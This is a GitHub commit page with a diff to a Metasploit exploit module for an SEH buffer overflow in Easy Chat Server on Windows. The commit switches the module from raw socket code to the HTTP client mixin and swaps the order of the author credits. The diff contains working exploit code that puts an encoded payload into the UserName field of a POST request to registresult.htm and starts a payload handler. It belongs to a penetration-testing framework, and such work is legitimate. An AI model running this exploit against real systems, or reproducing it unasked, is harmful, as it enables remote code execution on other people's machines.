Skip to content

Commit

Permalink
Exploit now uses HTTP mixin
Browse files Browse the repository at this point in the history
  • Loading branch information
Mzack9999 committed Jun 25, 2017
1 parent a886525 commit 66eb89e
Showing 1 changed file with 21 additions and 8 deletions.
29 changes: 21 additions & 8 deletions modules/exploits/windows/http/easychatserver_seh.rb
Original file line number Diff line number Diff line change
Expand Up @@ -7,8 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
#include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
Expand All @@ -18,8 +17,8 @@ def initialize(info = {})
},
'Author' =>
[
'Aitezaz Mohsin', #POC
'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
'Marco Rivoli', #Metasploit
'Aitezaz Mohsin' #POC
],
'License' => MSF_LICENSE,
'References' =>
Expand Down Expand Up @@ -52,10 +51,24 @@ def exploit
sploit << payload.encoded
sploit << rand_text_alpha_upper(200)

request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
connect
sock.put(request)
res = send_request_cgi({
'uri' => normalize_uri(URI,'registresult.htm'),
'method' => 'POST',
'vars_post' => {
'UserName' => sploit,
'Password' => 'test',
'Password1' => 'test',
'Sex' => 1,
'Email' => 'x@',
'Icon' => 'x.gif',
'Resume' => 'xxxx',
'cw' => 1,
'RoomID' => 4,
'RepUserName' => 'admin',
'submit1' => 'Register'
}
})
handler
disconnect

end
end

0 comments on commit 66eb89e

Please sign in to comment.